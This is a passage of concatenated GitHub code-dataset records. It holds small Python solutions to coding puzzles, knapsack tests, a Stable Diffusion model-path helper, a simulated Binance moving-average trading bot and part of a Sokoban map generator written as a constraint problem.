addToArrayForm(self, A, K):\n \"\"\"\n :type A: List[int]\n :type K: int\n :rtype: List[int]\n \"\"\"\n digits=A\n digits=list(map(str,digits))\n x=str(int(''.join(digits))+K)\n ans=[]\n for i in x:\n ans.append(int(i))\n return(ans)\n ","repo_name":"ashutoshv1520/Data-Structures-and-Algorithms","sub_path":"Arrays/Add to Array-Form of Integer.py","file_name":"Add to Array-Form of Integer.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17902109950","text":"# Autor: [loopTree] VGasparini 🎈\n# Nome: Número Perfeito\n# Nível: 1\n# Categoria: INICIANTE\n# URL: https://www.urionlinejudge.com.br/judge/pt/problems/view/1164\n\nn = int(input())\r\nfor i in range(n):\r\n a = []\r\n b = int(input())\r\n for j in range(int(b-1)):\r\n if(b%(j+1) == 0): a.append(j+1)\r\n\r\n if(sum(a)==b): print(b,\"eh perfeito\")\r\n else: print(b,\"nao eh perfeito\")\r\n\n","repo_name":"VGasparini/URIOnline","sub_path":"INICIANTE/1164 - Número Perfeito.py","file_name":"1164 - Número Perfeito.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70869543505","text":"import os\n\nfrom pydantic import BaseModel\n\nfrom . import config\n\n\nclass StableDiffusionModel(BaseModel):\n model_id: str\n\n def get_model_dir(self):\n return os.path.join(config.get(\"model_dir\"), self.model_id.replace(\"/\", os.sep))\n\n def get_trt_path(self):\n return os.path.join(\n config.get(\"model_dir\"),\n \"accelerate\",\n \"tensorrt\",\n self.model_id.replace(\"/\", os.sep),\n )\n\n def trt_available(self):\n trt_path = self.get_trt_path()\n necessary_files = [\n \"engine/clip.plan\",\n \"engine/unet.plan\",\n \"engine/vae.plan\",\n \"engine/vae_encoder.plan\",\n \"onnx/clip.opt.onnx\",\n \"onnx/unet.opt.onnx\",\n \"onnx/vae.opt.onnx\",\n \"onnx/vae_encoder.opt.onnx\",\n ]\n for file in necessary_files:\n filepath = os.path.join(trt_path, *file.split(\"/\"))\n if not os.path.exists(filepath):\n return False\n return True\n","repo_name":"umisetokikaze/diffusers-webui-branch-umise","sub_path":"modules/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18023950737","text":"from nose.tools import assert_equal, assert_raises\n\n\nclass TestKnapsack(object):\n\n def test_knapsack_bottom_up(self):\n knapsack = Knapsack()\n assert_raises(TypeError, knapsack.fill_knapsack, None, None)\n assert_equal(knapsack.fill_knapsack(0, 0), 0)\n items = []\n items.append(Item(label='a', value=2, weight=2))\n items.append(Item(label='b', value=4, weight=2))\n items.append(Item(label='c', value=6, weight=4))\n items.append(Item(label='d', value=9, weight=5))\n total_weight = 8\n expected_value = 13\n results = knapsack.fill_knapsack(items, total_weight)\n assert_equal(results[0].label, 'd')\n assert_equal(results[1].label, 'b')\n total_value = 0\n for item in results:\n total_value += item.value\n assert_equal(total_value, expected_value)\n print('Success: test_knapsack_bottom_up')\n\n def test_knapsack_top_down(self):\n knapsack = KnapsackTopDown()\n assert_raises(TypeError, knapsack.fill_knapsack, None, None)\n assert_equal(knapsack.fill_knapsack(0, 0), 0)\n items = []\n items.append(Item(label='a', value=2, weight=2))\n items.append(Item(label='b', value=4, weight=2))\n items.append(Item(label='c', value=6, weight=4))\n items.append(Item(label='d', value=9, weight=5))\n total_weight = 8\n expected_value = 13\n assert_equal(knapsack.fill_knapsack(items, total_weight), expected_value)\n print('Success: test_knapsack_top_down')\n\ndef main():\n test = TestKnapsack()\n test.test_knapsack_bottom_up()\n test.test_knapsack_top_down()\n\n\nif __name__ == '__main__':\n main()","repo_name":"Moado/Interactive-Coding-Challenges-","sub_path":"recursion_dynamic/knapsack_01/test_knapsack.py","file_name":"test_knapsack.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"9889681332","text":"#!/usr/bin/env python\nimport os\nfrom pathlib import Path\n\nparent = Path(__file__).resolve().parent\nintputFile = os.path.join(parent, 'Input.txt')\nfile = open(intputFile)\n\nnumbers = file.readlines()\ncounter = 0\nincreasedCounter = 0\ndecreasedCounter = 0\n\nfor number in numbers:\n # check for second index\n inumber = int(number)\n if counter > 0:\n # compare to previous number\n if inumber > previous:\n increasedCounter += 1\n else:\n decreasedCounter += 1\n\n previous = inumber\n counter += 1\n\nprint('Increased ', increasedCounter, ' times')\nprint('Decreased ', decreasedCounter, ' times')\nprint('Counter ', counter)\n","repo_name":"jcwalker/AdventOfCode","sub_path":"2021/Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28825594704","text":"import BinanceRestLib\n\nimport json\nimport time\nimport math\nfrom datetime import datetime\nfrom collections import deque\n\ndef getHistoryCandle(symbol, interval, count, time_offset):\n param = {}\n param['symbol'] = symbol\n param['interval'] = interval\n param['limit'] = count\n\n # # calculate the begin time of the requried candle history\n # if interval == '1m':\n # startTime = int((time.time() - 60*count)*1000)\n # elif interval == '5m':\n # startTime = int((time.time() - 300*count)*1000)\n # else:\n # print(\"Not defined interval!!!!\")\n\n # param['startTime'] = startTime + time_offset\n\n # call rest full API to get the history data\n response = BinanceRestLib.getService('klines', param)\n return response\n\ndef saveHistoryCandle(symbol, interval, count):\n time_offset = BinanceRestLib.getServerTimeOffset()\n response = getHistoryCandle(symbol,interval,count,time_offset)\n file_out = open('C:/Users/Cibobo/Documents/Coins/Python/MA/ExampleCandles.txt', 'w+')\n json.dump(response,file_out)\n file_out.close()\n \ndef calculateSMA(data, interval):\n data_len = len(data)\n # e.g for data_len = 10, interval = 7, only 10-7+1=4 SMA value can be calculated\n SMA = []\n # calculate the first value with data [0] to [interval-1] \n current_value = sum(data[:interval])/interval\n SMA.append(current_value)\n # calculate the rest with the update formel from interval to data_len-1\n for i in range(interval, data_len):\n # minus the oldest average value\n current_value -= data[i-interval]/interval\n # add the newest average value\n current_value += data[i]/interval\n # save the value to result array\n SMA.append(current_value)\n\n return SMA \n\ndef gradientChcck(a, b, threadhold):\n if (b-a)/a > threadhold:\n return True\n else:\n return False\n \n# convert candle data from 1 min cyclic to N min\ndef dataConvert1mToNm(data, N):\n convertData = []\n data_length = int(len(data)/N)*N\n print(data_length)\n for i in range(0, data_length, N):\n # init temp with first data element\n temp = data[i]\n for j in range(1,N):\n # get highest as high\n if data[i+j][2] > temp[2]:\n temp[2] = data[i+j][2]\n # get lowest as low\n if data[i+j][3] < temp[3]:\n temp[3] = data[i+j][3]\n # add volumn\n temp[5] += data[i+j][5]\n # add other infors from position 7~11\n temp[7:12] = [sum(x) for x in zip(temp[7:12], data[i+j][7:12])]\n \n # set close price and close time from last element in N min\n temp[4] = data[i+N-1][4]\n temp[6] = data[i+N-1][6]\n\n # set the current price also fromt the lase minute\n temp[12] = data[i+N-1][12]\n\n # add the converted data into list\n convertData.append(temp)\n \n return convertData\n \n\nclass MovingAverage(object):\n # maximum length of MA queue\n max_MA_len = 10\n # fixed candle interval\n #TODO: use other time interval instead the fixed 1m\n candle_interval = '1m'\n\n # gradient threashold for the MA long\n grad_MA_long_threadhold = 0\n\n # Test coins\n symbol_vol = 0\n coin_vol = 0.1\n\n # Diff factor\n diff_factor = 0.00013\n # Stop loss factor\n loss_factor = 1\n\n def __init__(self, symbol, long_interval, short_interval, isTest, data_index=4):\n self.symbol = symbol\n self.long_interval = long_interval\n self.short_interval = short_interval\n # data index define which price should be used for MA:\n # 1.open, 2.high, 3.low, 4.close\n self.data_index = data_index\n\n # queue to save the history MA data\n self.MA_long = deque([0]*self.max_MA_len)\n self.MA_short = deque([0]*self.max_MA_len)\n\n # data queue to save the history candle data, the length equal to the interval\n self.MA_long_data = deque([0]*self.long_interval)\n self.MA_short_data = deque([0]*self.short_interval)\n\n # get exchange info for the trading limit\n # self.getExchangeInfo()\n # print(\"Min Price is: \", self.minPrice, \" \\nMin Quantity is: \", self.minQty)\n\n # trading volumn is used to get the real buy/sell price\n self.trading_vol = {'buy':0,'sell':0}\n self.initTradingVolumn()\n print(self.trading_vol)\n\n # get the time offset to the server\n self.time_offset = BinanceRestLib.getServerTimeOffset()\n\n # parameter to save the current trading state\n self.state = 'INIT'\n\n if isTest:\n self.initTestData()\n else:\n # calculate the first SMA data to start the trading\n # self.initSMA()\n self.initEMA()\n # Save trading data for further test\n self.initSaveTestData()\n\n # Delta used to increase the long EMA value, in order to trigger a new buy change after stop loss\n self.delta = 0\n\n # init log file\n file_out = open('TradingInfo.log','a')\n file_out.write(str(datetime.now())+'\\n')\n file_out.close()\n\n # save the current timestamp to keep 1 min cyclic\n self.last_timestamp = time.time()\n\n def initRawData(self, need_limit):\n # call API to get the raw data\n raw_data = getHistoryCandle(self.symbol, self.candle_interval, need_limit, self.time_offset)\n # get out only the needed index\n self.data = []\n for i in range(len(raw_data)):\n self.data.append(float(raw_data[i][self.data_index]))\n\n print(self.data)\n\n def initTradingVolumn(self):\n # get the current price with the init trading volumn\n price = BinanceRestLib.getCurrentPriceTicker(self.symbol[:-3], self.symbol[-3:])\n # calculate the needed trading volumn\n self.trading_vol['buy'] = self.coin_vol/price\n self.trading_vol['sell'] = self.coin_vol/price\n\n def getExchangeInfo(self):\n exchangeInfo = BinanceRestLib.getExchangeInfo()\n # update exchange info in local\n # file_out = open('C:/Users/Cibobo/Documents/Coins/Python/ExchangeInfo.txt','w+')\n # json.dump(exchangeInfo, file_out)\n # file_out.close()\n\n # get exchange info \n # get all filters for the target trading symbol\n filters = next(item for item in exchangeInfo['symbols'] if item['symbol'] == str(self.symbol))['filters']\n \n # minimum trading volumn unit\n self.minQty = float(filters[1]['stepSize'])\n \n # minimum trading price unit\n self.minPrice = float(filters[0]['tickSize'])\n\n # calculate the precise\n self.price_precise = int(-math.log10(self.minPrice))\n\n def initSMA(self):\n # calculate how much history data are needed at the beginning\n need_limit = self.max_MA_len + self.long_interval - 1\n # # get the history raw data from server\n self.initRawData(need_limit)\n\n # ----------------- hanlding of SAM Long -------------------------\n # calculate the first SMA in SMA_long\n SMA_long_0 = sum(self.data[:self.long_interval])/self.long_interval\n # add this value into the queue and pop the left default value\n self.MA_long.popleft()\n self.MA_long.append(SMA_long_0)\n # add also the raw data into history candle data queue for the future calculation\n self.MA_long_data = deque(self.data[:self.long_interval])\n\n # ----------------- hanlding of SAM Short ------------------------\n # calculate the first SMA in SMA_long\n SMA_short_0 = sum(self.data[(self.long_interval-self.short_interval):self.long_interval])/self.short_interval\n # add this value into the queue and pop the left default value\n self.MA_short.popleft()\n self.MA_short.append(SMA_short_0)\n # add also the raw data into history candle data queue for the future calculation\n self.MA_short_data = deque(self.data[(self.long_interval-self.short_interval):self.long_interval])\n\n\n # calculate the rest of the SMA with iterator algorithm\n for i in range(1,self.max_MA_len):\n # the new raw data\n new_data = self.data[self.long_interval+i-1]\n\n self.updateSMA(self.MA_long, self.MA_long_data, self.long_interval, new_data)\n self.updateSMA(self.MA_short, self.MA_short_data, self.short_interval, new_data)\n\n print(i,\" th itegration is completed\")\n print(self.MA_long)\n print(self.MA_long_data)\n print(\"Short SMA\")\n print(self.MA_short)\n print(self.MA_short_data)\n\n def updateSMA(self, SMA, SMA_data, interval, new_data):\n # the last SMA value\n temp = SMA[-1]\n\n # pop the oldes history data and add the new one\n old_data = SMA_data.popleft()\n SMA_data.append(new_data)\n\n # minus the fisrt average value and add the new one\n temp -= old_data/interval\n temp += new_data/interval\n\n # add the new calculated SMA into the queue and remove the oldest one\n SMA.popleft()\n SMA.append(temp)\n\n def initEMA(self):\n # calculate how much history data are needed at the beginning\n # the needed data set is calculated by expierent factor k=3.45\n need_limit = self.max_MA_len + math.ceil((self.long_interval+1)*3.45) - 1\n # get the history raw data from server\n self.initRawData(need_limit)\n\n # calculate the alpha\n self.alpha_long = 2/(self.long_interval+1)\n self.alpha_short = 2/(self.short_interval+1)\n print(\"Long alpha: \", self.alpha_long, \" | Short alpha: \", self.alpha_short)\n\n # add first data as S_0 into the last position of queue\n self.MA_long[-1] = self.data[0]\n self.MA_short[-1] = self.data[0]\n\n # calculate recusive for all other EMA value\n for i in range(1,need_limit):\n new_data = self.data[i]\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n # use all data to calulate short EMA, even if not all of them are needed.\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n print(i,\" th itegration is completed\")\n print(self.MA_long)\n print(\"Short SMA\")\n print(self.MA_short)\n\n def updateEMA(self, EMA, alpha, new_data):\n # get the last EMA\n temp = EMA[-1]\n # calculate new EMA value\n temp = alpha*new_data + (1-alpha)*temp\n # add the new calculated SMA into the queue and remove the oldest one\n EMA.popleft()\n EMA.append(temp)\n\n def initTestData(self):\n file_in = open('C:/Users/Cibobo/Documents/Coins/Python/MA/TestData/TestDataAll/TestData_EOSETH_2018_05_03_07_01', 'r+')\n # self.visual_data = json.loads(file_in.read())\n # self.test_data = deque(self.visual_data)\n\n # Test with 5 min candle data\n self.visual_data = dataConvert1mToNm(json.loads(file_in.read()), 1)\n self.test_data = deque(self.visual_data)\n\n file_in.close()\n\n self.alpha_long = 2/(self.long_interval+1)\n self.alpha_short = 2/(self.short_interval+1)\n print(\"Long alpha: \", self.alpha_long, \" | Short alpha: \", self.alpha_short)\n\n need_limit = self.max_MA_len + math.ceil((self.long_interval+1)*3.45) - 1\n first_test_data = self.test_data.popleft()\n self.MA_long[-1] = float(first_test_data[self.data_index])\n self.MA_short[-1] = float(first_test_data[self.data_index])\n\n for i in range(1,need_limit):\n new_data = float(self.test_data.popleft()[self.data_index])\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n # use all data to calulate short EMA, even if not all of them are needed.\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n # print(i,\" th itegration is completed\")\n # print(self.MA_long)\n # print(\"Short SMA\")\n # print(self.MA_short)\n\n # Data Array for Visulaization\n self.buy_timestamp = []\n self.buy_price = []\n self.sell_timestamp = []\n self.sell_price = []\n\n def checkState(self, state):\n # define state maschine for the MA state change\n # init\n # |\n # -<-- wait* --<-\n # | |\n # buy <------> sell\n # | |\n # ->-- hold* -->-\n if state == 'INIT':\n if self.MA_short[-1] <= self.MA_long[-1]:\n return 'WAIT'\n else:\n return 'INIT'\n \n if state == 'WAIT':\n if self.isBuyChance():\n return 'BUY'\n else:\n return 'WAIT'\n\n if state == 'BUY':\n if self.isSellChance():\n return 'SELL'\n else:\n return 'HOLD'\n\n if state == 'HOLD':\n if self.isSellChance():\n return 'SELL'\n else:\n return 'HOLD'\n \n if state == 'SELL':\n if self.isBuyChance():\n return 'BUY'\n else:\n return 'WAIT'\n\n def isBuyChance(self):\n # Checking Rule 1: \n # a. MA short through MA long from below; \n # b. MA long is moving up\n # if self.MA_short[-1] - self.MA_long[-1] > self.diff_factor*self.MA_long[-1] and \\\n # (self.MA_short[-2] - self.MA_long[-2] < 0 or self.MA_short[-3] - self.MA_long[-3] < 0) and \\\n # gradientChcck(self.MA_long[-2], self.MA_long[-1], self.grad_MA_long_threadhold): \n # print(self.MA_short[-1] - self.MA_long[-1], end=\" | \")\n # print((self.MA_long[-1]-self.MA_long[-2])/self.MA_long[-2], end=\" | \")\n\n # Checking Rule 1 with delta: \n # a. MA short through MA long from below; \n # b. MA long is moving up\n # if self.MA_short[-1] - (self.MA_long[-1]+self.delta) > self.diff_factor*(self.MA_long[-1]+self.delta) and \\\n # (self.MA_short[-2] - (self.MA_long[-2]+self.delta) < 0 or self.MA_short[-3] - (self.MA_long[-3]+self.delta) < 0) and \\\n # gradientChcck(self.MA_long[-2], self.MA_long[-1], self.grad_MA_long_threadhold): \n # print(self.MA_short[-1] - self.MA_long[-1], end=\" | \")\n # print((self.MA_long[-1]-self.MA_long[-2])/self.MA_long[-2], end=\" | \")\n\n # Checking Rule 2: \n # a. MA short will be through MA long from below acoording to a precondition with Linear Spline Interpolation\n # b. MA long is moving up\n # MA_long_pre = 2*self.MA_long[-1] - self.MA_long[-2]\n # MA_short_pre = 2*self.MA_short[-1] - self.MA_short[-2]\n # if MA_short_pre - MA_long_pre >= 1.0e-08 and \\\n # gradientChcck(self.MA_long[-2], self.MA_long[-1], self.grad_MA_long_threadhold):\n # print(MA_short_pre - MA_long_pre, end=\" | \")\n # print((self.MA_long[-1]-self.MA_long[-2])/self.MA_long[-2], end=\" | \") \n \n # Checking Rule 3:\n # a. MA short through MA long from below at t1; \n # b. MA long is moving up at t1;\n # c. MA short is moving up at t1+1\n if self.MA_short[-2] - self.MA_long[-2] > self.diff_factor*self.MA_long[-2] and \\\n self.MA_short[-3] - self.MA_long[-3] < 0 and \\\n gradientChcck(self.MA_long[-3], self.MA_long[-2], self.grad_MA_long_threadhold) and \\\n self.MA_short[-1]>self.MA_short[-2]: \n print(self.MA_short[-2] - self.MA_long[-2], end=\" | \")\n print((self.MA_long[-2]-self.MA_long[-3])/self.MA_long[-3], end=\" | \")\n\n return True\n else:\n return False\n\n def isSellChance(self):\n # Checking Rule 1: if MA short is going done through the MA long from above\n if self.MA_short[-1] < self.MA_long[-1]:\n\n # Checking Rule 2: if MA short is begin to going down\n # if self.MA_short[-1] - self.MA_short[-2] < 0:\n\n # Checking Rule 3: MA short will be through MA long from above acoording to a precondition with Linear Spline Interpolation\n # MA_long_pre = 2*self.MA_long[-1] - self.MA_long[-2]\n # MA_short_pre = 2*self.MA_short[-1] - self.MA_short[-2]\n # if MA_short_pre <= MA_long_pre:\n return True\n else:\n return False\n\n def MATrading(self):\n # calculate how much time should be waiting for\n time_diff = time.time() - self.last_timestamp\n # wait for the next candle cyclic\n time.sleep(60-time_diff)\n\n # get the current candle date\n response = getHistoryCandle(self.symbol, self.candle_interval, 1, self.time_offset)\n print(response)\n\n new_data = float(response[0][self.data_index])\n # update MA array and Data array\n # self.updateSMA(self.MA_long, self.MA_long_data, self.long_interval, new_data)\n # self.updateSMA(self.MA_short, self.MA_short_data, self.short_interval, new_data)\n\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n print(\"Itegration at time: \", datetime.fromtimestamp(int(response[0][0]/1000)))\n # print(self.MA_long)\n # print(self.MA_long_data)\n # print(\"Short MA\")\n # print(self.MA_short)\n # print(self.MA_short_data)\n\n # update trading state\n new_state = self.checkState(self.state)\n print(\"Current State is: \", new_state)\n\n # get current price\n price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n print(\"Current Price is: \", price)\n \n if new_state == 'BUY':\n # # get current price\n # price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n # Simulate buy\n self.symbol_vol = self.coin_vol/price['asks_vol']\n self.coin_vol = 0\n self.buy_price = price['asks_vol']\n print(\"Buy with price: \", price['asks_vol'], \"@ \", datetime.now())\n print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n \n # file_out_info = str(datetime.fromtimestamp(int(response[0][0]/1000)))\n # file_out_info = file_out_info + \" Buy with price: \" + str(price['asks_vol']) + \"\\n\"\n # file_out_info = file_out_info + \"Calculate balance is: Symbol: \" + str(self.symbol_vol) + \" | Coin : \" + str(self.coin_vol) + \"\\n\"\n # file_out_info = file_out_info + \"Last MA long value is: \" + str(self.MA_long[-2]) + \" | AM short value is: \" + str(self.MA_short[-2]) + \"\\n\"\n # file_out_info = file_out_info + \"Current MA long value is: \" + str(self.MA_long[-1]) + \" | AM short value is: \" + str(self.MA_short[-1]) + \"\\n\"\n self.writeLog(time.time(), price, \"Buy\")\n\n if new_state == 'SELL':\n # # get current price\n # price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n # Simulate buy\n self.coin_vol = self.symbol_vol*price['bids_vol']\n self.symbol_vol = 0\n print(\"Sell with price: \", price['bids_vol'], \"@ \", datetime.now())\n print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n\n # file_out_info = str(datetime.now())\n # file_out_info = file_out_info + \"Sell with price: \" + str(price['bids_vol']) + \"\\n\"\n # file_out_info = file_out_info + \"Calculate balance is: Symbol: \" + str(self.symbol_vol) + \" | Coin : \" + str(self.coin_vol) + \"\\n\"\n # file_out_info = file_out_info + \"Last MA long value is: \" + str(self.MA_long[-2]) + \" | AM short value is: \" + str(self.MA_short[-2]) + \"\\n\"\n # file_out_info = file_out_info + \"Current MA long value is: \" + str(self.MA_long[-1]) + \" | AM short value is: \" + str(self.MA_short[-1]) + \"\\n\"\n self.writeLog(time.time(), price, \"Sell\")\n\n # if new_state == 'HOLD':\n # # create a stop loss condition if it is needed\n # # if the current price is less than the last buy price\n # if float(price['asks_vol']) < self.buy_price*self.loss_factor:\n # print(\"Special cast: stop loss--------------------\")\n # self.coin_vol = self.symbol_vol*float(price['bids_vol'])\n # self.symbol_vol = 0\n # new_state = 'SELL'\n\n # print(\"Sell with price: \", price['bids_vol'], \"@ \", datetime.now())\n # print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n # self.writeLog(time.time(), price, \"Sell\")\n\n self.state = new_state\n\n # save all these data to local test\n test_data = response[0]\n test_data.append(price)\n self.saveTestData(test_data)\n\n\n # save the timestamp after all operations are executed\n self.last_timestamp = time.time()\n\n def MATradingTest(self):\n current_test_data = self.test_data.popleft()\n new_data = float(current_test_data[self.data_index])\n # update MA array and Data array\n # self.updateSMA(self.MA_long, self.MA_long_data, self.long_interval, new_data)\n # self.updateSMA(self.MA_short, self.MA_short_data, self.short_interval, new_data)\n\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n # print(\"Itegration at time: \", datetime.fromtimestamp(int(current_test_data[0]/1000)))\n # print(self.MA_long)\n # print(\"Short MA\")\n # print(self.MA_short)\n\n new_state = self.checkState(self.state)\n # print(\"Current State is: \", new_state)\n\n price = current_test_data[12]\n if new_state == 'BUY':\n # Simulate buy\n self.symbol_vol = self.coin_vol/float(price['asks_vol'])\n self.coin_vol = 0\n # print(\"Buy with price: \", price['asks_vol'], \"@ \", datetime.now())\n # print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n \n self.writeLog(int(current_test_data[0]/1000), price, \"Buy\")\n # print(\"Buy @\", int(current_test_data[0]/1000), \"with price: \", price['asks_vol'])\n \n # save trading info for visualization\n self.buy_timestamp.append(int(current_test_data[0]/1000))\n self.buy_price.append(float(price['asks_vol']))\n print(price['asks_vol'], end=\" | \")\n print(price['asks_vol']-self.MA_long[-1], end=\" | \")\n\n\n if new_state == 'SELL':\n # Simulate Sell\n self.coin_vol = self.symbol_vol*float(price['bids_vol'])\n self.symbol_vol = 0\n # print(\"Sell with price: \", price['bids_vol'], \"@ \", datetime.now())\n # print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n\n self.writeLog(int(current_test_data[0]/1000), price, \"Sell\")\n # print(\"Sell @\", int(current_test_data[0]/1000), \"with price: \", price['bids_vol'])\n\n # save trading info for visualization\n self.sell_timestamp.append(int(current_test_data[0]/1000))\n self.sell_price.append(float(price['bids_vol']))\n # print(\"Price diff: \", float(price['bids_vol'])-self.buy_price[-1])\n print(float(price['bids_vol'])-self.buy_price[-1])\n print()\n\n # if new_state == 'HOLD':\n # # create a stop loss condition if it is needed\n # # if the current price is less than the last buy price\n # if float(price['asks_vol']) < self.buy_price[-1]*self.loss_factor:\n # print(\"Special cast: stop loss\")\n # self.coin_vol = self.symbol_vol*float(price['bids_vol'])\n # self.symbol_vol = 0\n # self.writeLog(int(current_test_data[0]/1000), price, \"Sell\")\n # self.sell_timestamp.append(int(current_test_data[0]/1000))\n # self.sell_price.append(float(price['bids_vol']))\n # new_state = 'SELL'\n # set delta value\n # self.delta = self.MA_short[-1] - self.MA_long[-1]\n # print(\"Current delta: \", self.delta)\n \n\n self.state = new_state\n\n def writeLog(self, timestamp, price, trading_type):\n file_out = open('TradingInfo.log','a')\n file_out.write(str(datetime.fromtimestamp(timestamp)))\n\n if trading_type == \"Buy\":\n file_out.write(\" Buy with price: \" + str(price['asks_vol']) + \"\\n\")\n else:\n file_out.write(\" Sell with price: \" + str(price['bids_vol']) + \"\\n\")\n\n file_out.write(\"Calculate balance is: Symbol: \" + str(self.symbol_vol) + \" | Coin : \" + str(self.coin_vol) + \"\\n\")\n file_out.write(\"Last MA long value is: \" + str(self.MA_long[-2]) + \" | AM short value is: \" + str(self.MA_short[-2]) + \"\\n\")\n file_out.write(\"Current MA long value is: \" + str(self.MA_long[-1]) + \" | AM short value is: \" + str(self.MA_short[-1]) + \"\\n\")\n file_out.write(\"\\n\")\n file_out.close()\n\n # Save trading data for further test\n def initSaveTestData(self):\n self.test_data_save_name = \"TestData_\" + self.symbol + \"_\" + datetime.now().strftime(\"%Y_%m_%d_%H_%M\") \n test_file = open(self.test_data_save_name, 'a')\n test_file.write(\"[\")\n test_file.close()\n self.test_data_save_begin = time.time()\n\n def saveTestData(self, test_data):\n test_file = open(self.test_data_save_name, 'a')\n \n # create a new log file in every 24 Hour\n if time.time() - self.test_data_save_begin > 86400:\n # add the last data into the old file and close it \n test_file.write(str(test_data))\n test_file.write(\"]\")\n test_file.close()\n # create a new log\n self.initSaveTestData()\n else:\n test_file.write(str(test_data))\n test_file.write(\", \")\n test_file.close()\n \n\n\nisTest = False\ntest = MovingAverage('BNBETH',54,15,isTest)\n\nwhile True:\n test.MATrading()\n\n# while len(test.test_data)>0:\n# test.MATradingTest()\n\nprint(test.symbol_vol)\nprint(test.coin_vol)\n\n\n\n","repo_name":"cibobo/MovingAverage","sub_path":"MovingAverage.py","file_name":"MovingAverage.py","file_ext":"py","file_size_in_byte":26604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25946081434","text":"from itertools import combinations\nfrom simpleai.search import CspProblem, backtrack, MOST_CONSTRAINED_VARIABLE, LEAST_CONSTRAINING_VALUE, HIGHEST_DEGREE_VARIABLE\n\ndef armar_mapa(filas, columnas, cantidad_paredes, cantidad_cajas_objetivos):\n\n paredes = []\n cajas = []\n objetivos = []\n esquinas = [(0,0),(filas-1,0),(0,columnas-1),(filas-1,columnas-1)]\n\n for pared in range(cantidad_paredes):\n paredes.append('pared'+str(pared))\n\n for caja_objetivo in range(cantidad_cajas_objetivos):\n cajas.append('caja'+str(caja_objetivo))\n objetivos.append('obj'+str(caja_objetivo))\n\n variables = ['Jugador'] + cajas + objetivos + paredes\n print(variables)\n #/////////////////////////////////////////////////////////////////\n dominios = {}\n\n for var in variables:\n dominio_var = []\n for fila in range(filas):\n for col in range(columnas): \n if var in cajas:\n if (fila,col) not in esquinas:\n dominio_var.append((fila,col))\n else:\n dominio_var.append((fila,col))\n dominios[var] = dominio_var\n\n #print(dominios)\n #//////////////////////////////////////////////////////////////////\n\n restricciones = []\n\n def distinta_posicion(variables,values):\n pos_obj1, pos_obj2 = values\n return pos_obj1 != pos_obj2\n\n for obj1, obj2 in combinations([\"Jugador\"]+paredes+cajas,2):\n restricciones.append(((obj1,obj2),distinta_posicion))\n\n def distinta_posicion_paredobjetivo(variables,values):\n pos_pared, pos_objetivo = values\n return pos_pared != pos_objetivo\n\n for pared, objetivo in combinations(paredes+objetivos,2):\n restricciones.append(((pared,objetivo),distinta_posicion_paredobjetivo))\n\n def distinta_posicion_objetivo(variables,values):\n pos_pared, pos_objetivo = values\n return pos_pared != pos_objetivo\n\n for v1, v2 in combinations(objetivos,2):\n restricciones.append(((v1,v2), distinta_posicion_objetivo))\n\n def caja_contra_pared(posicion):\n return posicion[0] == 0 or posicion[0] == filas-1 or posicion[1] == 0 or posicion[1] == columnas-1\n\n def hasta_una_pared_adyacente (variables, values):\n caja , *paredes = values\n print(\"CAJA\",caja)\n print(\"PAREDES\",paredes)\n \n cantidad_paredes_adyacentes = 0\n\n if caja_contra_pared:\n cantidad_paredes_adyacentes += 1\n\n posiciones_adyacentes = [(caja[0]+1,caja[1]),(caja[0]-1,caja[1]),(caja[0],caja[1]+1),(caja[0],caja[1]-1)]\n for adyacente in posiciones_adyacentes:\n for pared in paredes: \n if pared == adyacente:\n cantidad_paredes_adyacentes += 1\n print(cantidad_paredes_adyacentes)\n return cantidad_paredes_adyacentes < 2\n\n\n for caja in cajas:\n if len(paredes) > 1:\n for pared1, pared2 in combinations(paredes,2):\n restricciones.append(((caja,pared1,pared2), hasta_una_pared_adyacente))\n else:\n restricciones.append((([caja]+paredes), hasta_una_pared_adyacente))\n\n\n socobanProblem = CspProblem(variables, dominios, restricciones)\n\n solucion = backtrack(\n socobanProblem,\n inference=False,\n variable_heuristic=MOST_CONSTRAINED_VARIABLE,\n value_heuristic=LEAST_CONSTRAINING_VALUE,\n )\n\n resultado_paredes = []\n for pared in paredes:\n resultado_paredes.append(solucion[pared])\n\n resultado_objetivos = []\n for objetivo in objetivos:\n resultado_objetivos.append(solucion[objetivo])\n\n resultado_cajas = []\n for caja in cajas:\n resultado_cajas.append(solucion[caja])\n\n\n print(solucion)\n return (resultado_paredes, resultado_cajas, resultado_objetivos, solucion['Jugador'])\n\nif __name__ == \"__main__\":\n 